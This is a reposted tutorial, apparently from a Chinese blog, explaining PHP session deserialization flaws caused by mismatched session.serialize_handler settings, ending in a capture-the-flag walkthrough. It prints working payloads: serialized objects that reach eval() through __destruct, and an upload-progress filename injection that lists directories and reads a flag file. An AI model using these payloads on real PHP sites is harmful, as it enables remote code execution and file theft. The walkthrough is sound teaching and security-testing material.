ホームページ  >  記事  >  バックエンド開発  >  PHP のセッション逆シリアル化の脆弱性の詳細な紹介

PHP のセッション逆シリアル化の脆弱性の詳細な紹介

WBOY
WBOY転載
2022-04-25 11:50:405859ブラウズ

この記事では、PHP に関する関連知識を提供します。この記事では、主にセッション逆シリアル化の脆弱性、つまりセッション データのシリアル化と保存、およびセッションの逆シリアル化と読み取りに関連する問題について紹介します。異なるデータ方法がセッション逆シリアル化の脆弱性を引き起こす. 皆様のお役に立てれば幸いです。

"PHP

推奨される調査: 「PHP ビデオ チュートリアル

PHP セッションの逆シリアル化の脆弱性

PHP session逆シリアル化の脆弱性は、[Session データのシリアル化されたストレージ] と [Session データの逆シリアル化された読み取り]session の生成の違いによって引き起こされます。逆シリアル化の脆弱性

セッションとは

公式セッション定義: コンピュータ、特にネットワーク アプリケーションでは、「セッション コントロール」と呼ばれます。 Session オブジェクトには、特定のユーザー セッションに必要なプロパティと構成情報が格納されます。主な機能は次のとおりです。

  • session保存場所はサーバー側です
  • session通常は一致する必要がありますcookieUse

HTTP のステートレスな性質により、サーバーは現在のユーザー ステータスを識別するために session を生成します。

本質的には、session は、サーバー側で保守できるデータ ストレージ テクノロジです。つまり、**session技術とはデータベースとは別のバックエンドをベースにデータを一時的に保存する技術です**

PHPセッションワークフロー

PHPを例: session

  1. の原理を理解する PHP スクリプトが session_start() を使用して session セッションを開くと、 が自動的に検出されます。 PHPSESSID
    • Cookie が存在する場合は、PHPSESSID
    • を取得します。Cookie が存在しない場合は、PHPSESSID し、応答ヘッダーを通じて Cookie の形式でブラウザに保存します。
  2. スーパー グローバル変数 $_SESSION を空の配列
  3. PHP は PHPSESSID を使用して、対応するファイルと一致する場所 (PHPSESSID ファイルの保存場所) を指定します
    • ファイルは存在します。ファイルの内容 (逆シリアル化モードを使用)、データを $_SESSION
    • に保存します。ファイルが存在しません: session_start() は、PHPSESSIDという名前のファイル
    • # を作成します。
  4. ## プログラムの実行後、
  5. $_SESSION に保存されたすべてのデータがシリアル化され、PHPSESSID
  6. に対応するファイルに保存されます。
具体的な概略図:

""

php.ini セッション構成

php.iniさらに重要な セッションがあります設定項目

session.save_path="/tmp"      --设置session文件的存储位置
session.save_handler=files    --设定用户自定义存储函数,如果想使用PHP内置session存储机制之外的可以使用这个函数
session.auto_start= 0          --指定会话模块是否在请求开始时启动一个会话,默认值为 0,不启动
session.serialize_handler= php --定义用来序列化/反序列化的处理器名字,默认使用php  
session.upload_progress.enabled= On --启用上传进度跟踪,并填充$ _SESSION变量,默认启用
session.upload_progress.cleanup= oN --读取所有POST数据(即完成上传)后立即清理进度信息,默认启用
PHPセッションシリアル化メカニズム

php.iniの設定項目に従って、に保存されているすべてのデータのシリアル化を検討します。 $_SESSION PHPSESSID に対応するファイルに保存され、3 つの異なる処理形式、つまり session.serialize_handler で定義された 3 つのエンジンが使用されます。

#プロセッサphpphp_binaryphp_serialize (php>=5.5.4) ## PHP プロセッサ
対応する保存形式
キー名 + 縦棒 + シリアル化後( ) deserialization関数で処理された値
キー名+キー名+serialize( ) 関数 deserialization
serialize() 関数によって逆シリアル化された配列
まず、デフォルトの

session.serialize_handler = php

の場合のシリアル化結果を見てみましょう。コードは次のとおりです。

<?php//ini_set(&#39;session.serialize_handler&#39;,&#39;php&#39;);session_start();$_SESSION[&#39;name&#39;] = $_GET[&#39;name&#39;];echo $_SESSION[&#39;name&#39;];?>

見やすくするために、""session

ストレージ ディレクトリを

session.save_path = "/www/php_session" に設定し、PHPSESSID ファイルを次のようにします。次のように

1. ファイル名""

ファイル名は

sess_mpnnbont606f50eb178na451od

で、

mpnnbont606f50eb178na451odは#です。後続のリクエスト ヘッダーの Cookie によって運ばれる ##PHPSESSID の値 (上の図に示すように、ブラウザに保存されています)2. ファイルの内容php プロセッサの保存形式

キー名垂直バー##$_SESSION[ 'name'] キー名: name|s:6:"harden";

php_binary处理器

使用php_binary处理器,即session.serialize_handler = php_binary

<?phpini_set(&#39;session.serialize_handler&#39;,&#39;php_binary&#39;);session_start();# 为了方便ACSII显示,将键名设置为36个字符长度$_SESSION[&#39;namenamenamenamenamenamenamenamename&#39;] = $_GET[&#39;name&#39;];echo $_SESSION[&#39;namenamenamenamenamenamenamenamename&#39;];?>

由于三种方式PHPSESSID文件名都是一样的,这里只需要查看文件内容

""

serialize() 関数によって逆シリアル化された値
键名的长度对应的 ASCII 字符 键名 经过 serialize() 函数反序列处理的值.
$ namenamenamenamenamenamenamenamename s:6:“harden”;

php_serialize 处理器

使用php_binary处理器,即session.serialize_handler = php_serialize

<?phpini_set(&#39;session.serialize_handler&#39;,&#39;php_serialize&#39;);session_start();$_SESSION[&#39;name&#39;] = $_GET[&#39;name&#39;];echo $_SESSION[&#39;name&#39;];?>

文件内容即经过 serialize() 函数反序列处理的数组,a:1:{s:4:"name";s:6:"harden";}

""

session的反序列化漏洞利用

session的反序列化漏洞,就是利用php处理器和php_serialize处理器的存储格式差异而产生,通过具体的代码我们来看下漏洞出现的原因

漏洞成因

首先创建session.php,使用php_serialize处理器来存储session数据

<?phpini_set(&#39;session.serialize_handler&#39;,&#39;php_serialize&#39;);session_start();$_SESSION[&#39;session&#39;] = $_GET[&#39;session&#39;];echo $_SESSION[&#39;session&#39;];?>

test.php,使用默认php处理器来存储session数据

<?phpsession_start();class f4ke{
    public $name;
    function __wakeup(){
      echo "Who are you?";
    }
    function __destruct(){
      eval($this->name);
    }}$str = new f4ke();?>

接着,我们构建URL进行访问session.php

http://www.session-serialize.com/session.php?session=|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}

""

打开PHPSESSID文件可看到序列化存储的内容

a:1:{s:7:"session";s:45:"|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}

""

漏洞分析:

session.php程序执行,我们将|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}通过php_serialize处理器序列化保存成PHPSESSID文件;

由于浏览器中保存的PHPSESSID文件名不变,当我们访问test.phpsession_start();找到PHPSESSID文件并使用php处理器反序列化文件内容,识别格式即

键名 竖线 经过 serialize() 函数反序列处理的值
a:1:{s:7:“session”;s:45:" | O:4:“f4ke”:1:{s:4:“name”;s:10:“phpinfo();”;}

php处理器会以|作为分隔符,将O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}反序列化,就会触发__wakeup()方法,最后对象销毁执行__destruct()方法中的eval()函数,相当于执行如下:

$_SESSION['session'] = new f4ke();$_SESSION['session']->name = 'phpinfo();';

我们访问test.php,即可直接执行phpinfo()函数

""

CTF例题:PHPINFO

<?php//A webshell is wait for youini_set(&#39;session.serialize_handler&#39;, &#39;php&#39;);session_start();class OowoO{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'phpinfo();';
    }
    
    function __destruct()
    {
        eval($this->mdzz);
    }}if(isset($_GET['phpinfo'])){
    $m = new OowoO();}else{
    highlight_string(file_get_contents('index.php'));}?>

我们可以看到ini_set('session.serialize_handler', 'php'),判断可能存在session反序列化漏洞,根据代码逻辑,访问URL加上phpinfo参数新建对象触发魔术方法执行phpinfo()函数,进一步查看session.serialize_handler配置

""

可见php.inisession.serialize_handler = php_serialize,当前目录中被设置为session.serialize_handler = php,因此存在session反序列化利用的条件

补充知识

phpinfo文件中

local value(局部变量:作用于当前目录程序,会覆盖master value内容):php
master value(主变量:php.ini里面的内容):php_serialize

那么我们如何找到代码入口将利用代码写入到session文件?想要写入session文件就得想办法在$_SESSION变量中增加我们可控的输入点

补充知识

当检测Session 上传进度这一特性是开启状态,我们可以在客户端写一个文件上传的功能,文件上传的同时,POST一个与php.ini中设置的session.upload_progress.name同名变量PHP_SESSION_UPLOAD_PROGRESS,如下图,即可写入$_SESSION,进一步序列化写入session文件

""

下面是官方给出的一个文件上传时监测进度例子:

<form action="upload.php" method="POST" enctype="multipart/form-data">
 <input type="hidden" name="<?php echo ini_get("session.upload_progress.name"); ?>" value="123" /> <input type="file" name="file1" />
 <input type="file" name="file2" />
 <input type="submit" /></form>

其中name=""也可以设置为name="PHP_SESSION_UPLOAD_PROGRESS"

在session中存储的上传进度,如下所示:

<?php$_SESSION["upload_progress_123"] = array(
 "start_time" => 1234567890,   // The request time  请求时间
 "content_length" => 57343257, // POST content length 长度
 "bytes_processed" => 453489,  // Amount of bytes received and processed 已接收字节
 "done" => false,              // true when the POST handler has finished, successfully or not 是否上传完成
 "files" => array(//上传的文件
  0 => array(
   "field_name" => "file1",       // Name of the <input/> field  input中设定的变量名
   // The following 3 elements equals those in $_FILES             
   "name" => "foo.avi",           //文件名
   "tmp_name" => "/tmp/phpxxxxxx",
   "error" => 0,
   "done" => true,                // True when the POST handler has finished handling this file
   "start_time" => 1234567890,    // When this file has started to be processed
   "bytes_processed" => 57343250, // Amount of bytes received and processed for this file
  ),
  // An other file, not finished uploading, in the same request
  1 => array(
   "field_name" => "file2",
   "name" => "bar.avi",
   "tmp_name" => NULL,
   "error" => 0,
   "done" => false,
   "start_time" => 1234567899,
   "bytes_processed" => 54554,
  ),
 ));

其中,session中的field_namename都是我们可控的输入点!

下面我们就开始解题拿到flag

首先,http://web.jarvisoj.com:32784/index.php?phpinfo查询设置

""

session.upload_progress.enabled = On   --表明允许上传进度跟踪,并填充$ _SESSION变量
session.upload_progress.cleanup = Off  --表明所有POST数据(即完成上传)后,不清理进度信息($ _SESSION变量)

即允许上传进度跟踪且结束后不清除数据,更有利使用session.upload_progress.name来将利用代码写入session文件

构造POST表单提交上传文件

<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data">
 <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
 <input type="file" name="file" />
 <input type="submit" /></form>

构造序列化字符串作为payload(利用代码)

<?phpclass OowoO{
    public $mdzz=&#39;print_r(scandir(dirname(__FILE__)));&#39;;}$obj = new OowoO();echo serialize($obj);?>//O:5:"OowoO":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";}

为了防止"被转义,我们在payload中加入\

随意选择文件,点击表单提交,使用抓包工具burpsuite抓取请求包

""

并修改filename值为

|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}

发送请求包,代码执行过程分析:

""

因此直接执行print_r(scandir(dirname(__FILE__)));并返回

""

phpinfo查看当前目录,/opt/lampp/htdocs/

""

构造最终payload读取Here_1s_7he_fl4g_buT_You_Cannot_see.php文件内容,即flag

|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}

""

推荐学习:《PHP视频教程

以上がPHP のセッション逆シリアル化の脆弱性の詳細な紹介の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

声明:
この記事はcsdn.netで複製されています。侵害がある場合は、admin@php.cn までご連絡ください。